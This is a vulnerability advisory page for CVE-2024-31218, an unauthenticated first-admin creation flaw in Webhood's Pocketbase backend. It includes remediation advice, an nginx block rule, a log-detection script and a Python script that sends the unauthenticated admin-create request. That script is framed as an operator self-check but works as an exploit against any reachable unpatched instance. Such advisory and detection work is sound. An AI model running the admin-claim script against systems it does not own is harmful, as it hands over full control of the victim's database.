CVE-2024-31218 in Webhood

Summary

by MITRE • 04/05/2024

Webhood is a self-hosted URL scanner used for analyzing phishing and malicious sites. Webhood's backend container images in versions 0.9.0 and earlier are subject to a Missing Authentication for Critical Function vulnerability. This vulnerability allows an unauthenticated attacker to send an HTTP request to the database (Pocketbase) admin API to create an admin account. The Pocketbase admin API does not check for authentication/authorization when creating an admin account if no admin accounts have been added yet. In its default deployment, Webhood does not create a database admin account. Therefore, unless users have manually created an admin account in the database, no admin account exists in the deployment and the deployment is vulnerable. Versions starting from 0.9.1 are patched. The patch creates a randomly generated admin account if no admin account has already been created, i.e. in exactly the deployments where the vulnerability is exploitable. As a workaround, users can disable access to URL paths starting with `/api/admins` entirely. With this workaround, the vulnerability is not exploitable via the network.


Analysis

by VulDB Data Team • 04/05/2024

The vulnerability identified as CVE-2024-31218 affects Webhood, a self-hosted URL scanning tool designed for analyzing phishing and malicious websites. Webhood uses Pocketbase as its backend database, and in versions 0.9.0 and earlier the way Pocketbase is deployed leaves a critical gap. The flaw is a Missing Authentication for Critical Function weakness (CWE-306): an administrative function, the creation of a Pocketbase admin account, can be invoked without any authentication. The exposed endpoint is the Pocketbase admin API; the root cause is Webhood's default deployment configuration, which never creates that first admin account.

Technically, the vulnerability stems from Pocketbase's bootstrap behavior: when no admin account exists, the admin API accepts a request to create one without requiring any credentials, since there is no admin who could authenticate yet. As a result, any unauthenticated client that can reach the database's admin API over the network can create the first admin account. This matters for Webhood because its default installation does not create a database admin account, so a deployment stays in this bootstrap state indefinitely until someone creates one manually. Whoever sends that first request, operator or attacker, obtains administrative control of the database without any prior credentials or authorization.
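The bootstrap condition above doubles as the operator's own check and fix: whoever sends the first admin-create request owns the slot. The script below is an added example, not Webhood's or Pocketbase's own code, that claims that slot for the operator with a strong password and reports what the response implies. Its assumptions are labelled: the endpoint is `POST /api/admins` with a JSON body of `email`, `password` and `passwordConfirm`; a 2xx reply means the account was created (so the deployment was exposed until this moment); 401, 403 or 404 means an admin already exists or the path is blocked by the `/api/admins` workaround. `fake_opener` is a constructed offline transport so the logic can be exercised without a network.

```python
"""Operator self-check / first-admin claim for CVE-2024-31218.

Added example, not Webhood's or Pocketbase's own code. Assumptions
(labelled): the admin-create endpoint is POST {base}/api/admins with a
JSON body of email, password and passwordConfirm; a 2xx reply means the
account was created, 401/403/404 means an admin already exists or the
path is blocked by the /api/admins workaround.
"""
import json
import secrets
import urllib.error
import urllib.request

ADMIN_PATH = "/api/admins"  # Pocketbase admin API prefix named in the advisory


def build_request(base_url, email, password):
    """Build the unauthenticated admin-create request the advisory describes."""
    body = json.dumps(
        {"email": email, "password": password, "passwordConfirm": password}
    ).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + ADMIN_PATH,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def send(req, opener=None):
    """Return the HTTP status code; urllib raises on 4xx/5xx, so unwrap it."""
    opener = opener or urllib.request.urlopen
    try:
        with opener(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(status):
    if 200 <= status < 300:
        return "EXPOSED_NOW_CLAIMED"      # slot was open; it is now ours
    if status in (401, 403, 404):
        return "ADMIN_EXISTS_OR_BLOCKED"  # someone holds it, or the path is blocked
    return "UNEXPECTED"


def claim_first_admin(base_url, email, password=None, opener=None):
    """Claim the first admin slot; returns (verdict, status, password)."""
    password = password or secrets.token_urlsafe(24)  # strong random password
    status = send(build_request(base_url, email, password), opener)
    return classify(status), status, password


def fake_opener(status):
    """Constructed offline transport (for demonstration/tests, no network)."""
    class _Resp:
        def __init__(self):
            self.status = status

        def __enter__(self):
            return self

        def __exit__(self, *exc):
            return False

    def _open(req, timeout=10):
        if status >= 400:
            raise urllib.error.HTTPError(req.full_url, status, "simulated", None, None)
        return _Resp()

    return _open


if __name__ == "__main__":
    import sys
    verdict, status, pw = claim_first_admin(sys.argv[1], sys.argv[2])
    print(verdict, status)
    if verdict == "EXPOSED_NOW_CLAIMED":
        print("admin created; store this password now:", pw)
```

Run it only against your own deployment (`python claim_admin.py https://webhood.example ops@example.com`). If it reports `ADMIN_EXISTS_OR_BLOCKED` on a 0.9.0 instance where you never created an admin and have no proxy block in place, treat that as a sign that someone else may have claimed the slot, and review the admin list in the Pocketbase admin UI before trusting the instance.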

The impact goes beyond simple unauthorized access: a Pocketbase admin has full control over the database behind Webhood. An attacker holding that account can read and modify scan results and other stored records, alter or delete data the scanner has collected, and access any user information the system stores. Confidentiality, integrity and availability of the deployment are all affected, which is a significant risk for organizations that rely on Webhood in their security operations, because the compromise sits at the data layer that every scan result passes through.

Webhood 0.9.1 and later fix the issue by creating a randomly generated admin account whenever no admin account exists, so the unauthenticated bootstrap path is never left open. The patch follows the secure-by-default principle: a critical function is protected regardless of the system's initial state, in line with authentication controls such as NIST SP 800-53 IA-2. As a workaround, operators can block every URL path beginning with `/api/admins` at the reverse proxy or firewall in front of Pocketbase, which makes the flaw unexploitable over the network, at the cost of also blocking legitimate use of the admin API, including the Pocketbase admin UI's login. In ATT&CK terms, exploitation corresponds to T1190 (Exploit Public-Facing Application) followed by T1136 (Create Account); the phishing technique T1566 is not involved. One practical check after upgrading or applying the workaround: confirm that any admin account already present in the database was created by you, since on an unpatched deployment the only other way it could have appeared is through this vulnerability.
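Retrospective detection for the exposure described above, as an added example that is not part of the page or the Webhood project: given reverse-proxy access logs in nginx's combined format, it flags successful `POST /api/admins` requests, which on an unpatched deployment with no admin account are first-admin creations, and tallies all activity under that prefix per client and status so reconnaissance and blocked attempts show up too. The log lines are constructed; the path `/api/admins/auth-with-password` is assumed to be Pocketbase's admin login endpoint.

```python
"""Access-log detection for CVE-2024-31218 first-admin creation.

Added example, not Webhood's code. Assumes the proxy in front of Pocketbase
writes nginx's "combined" log format; SAMPLE_LOG below is constructed.
"""
import re
from collections import Counter

ADMIN_PREFIX = "/api/admins"  # admin API prefix named in the advisory

# nginx combined: ip ident user [time] "METHOD path proto" status bytes "referer" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: one successful first-admin creation, one login probe,
# one attempt blocked by the /api/admins proxy workaround, normal traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Apr/2024:10:12:01 +0000] "GET /api/health HTTP/1.1" 200 15 "-" "curl/8.4.0"
203.0.113.7 - - [05/Apr/2024:10:12:03 +0000] "POST /api/admins HTTP/1.1" 200 212 "-" "python-requests/2.31"
198.51.100.9 - - [05/Apr/2024:11:02:44 +0000] "POST /api/admins/auth-with-password HTTP/1.1" 401 44 "-" "Mozilla/5.0"
192.0.2.20 - - [05/Apr/2024:11:30:00 +0000] "POST /api/admins HTTP/1.1" 403 0 "-" "curl/8.4.0"
192.0.2.20 - - [05/Apr/2024:11:31:10 +0000] "POST /api/collections/scans/records HTTP/1.1" 200 530 "-" "webhood-ui"
"""


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def strip_query(path):
    return path.split("?", 1)[0]


def is_admin_path(path):
    """True for the admin endpoint itself or anything below it (query ignored)."""
    p = strip_query(path)
    return p == ADMIN_PREFIX or p.startswith(ADMIN_PREFIX + "/")


def find_admin_creations(lines):
    """Entries that look like a successful admin-create: POST to the bare
    /api/admins path answered with 2xx."""
    hits = []
    for line in lines:
        e = parse(line)
        if not e:
            continue
        if (e["method"] == "POST"
                and strip_query(e["path"]) == ADMIN_PREFIX
                and e["status"].startswith("2")):
            hits.append(e)
    return hits


def admin_api_activity(lines):
    """Count every request under /api/admins by (client ip, status)."""
    counts = Counter()
    for line in lines:
        e = parse(line)
        if e and is_admin_path(e["path"]):
            counts[(e["ip"], e["status"])] += 1
    return counts


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for e in find_admin_creations(lines):
        print("ADMIN CREATED", e["time"], e["ip"], e["ua"])
    for (ip, status), n in sorted(admin_api_activity(lines).items()):
        print("admin-api", ip, status, n)
```

With the proxy workaround in place (for nginx, a `location ^~ /api/admins { return 403; }` block in the server that fronts Pocketbase), the 403 line is what a blocked attempt looks like; a 2xx on the bare `/api/admins` path dated before the upgrade to 0.9.1 is the event to investigate, and the `/api/admins/auth-with-password` line shows that blocking the prefix also catches legitimate admin logins.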

Responsible

GitHub, Inc.

Reservation

03/29/2024

Disclosure

04/05/2024

Moderation

accepted

CPE

ready

EPSS

0.00715

KEV

no

Activities

very low
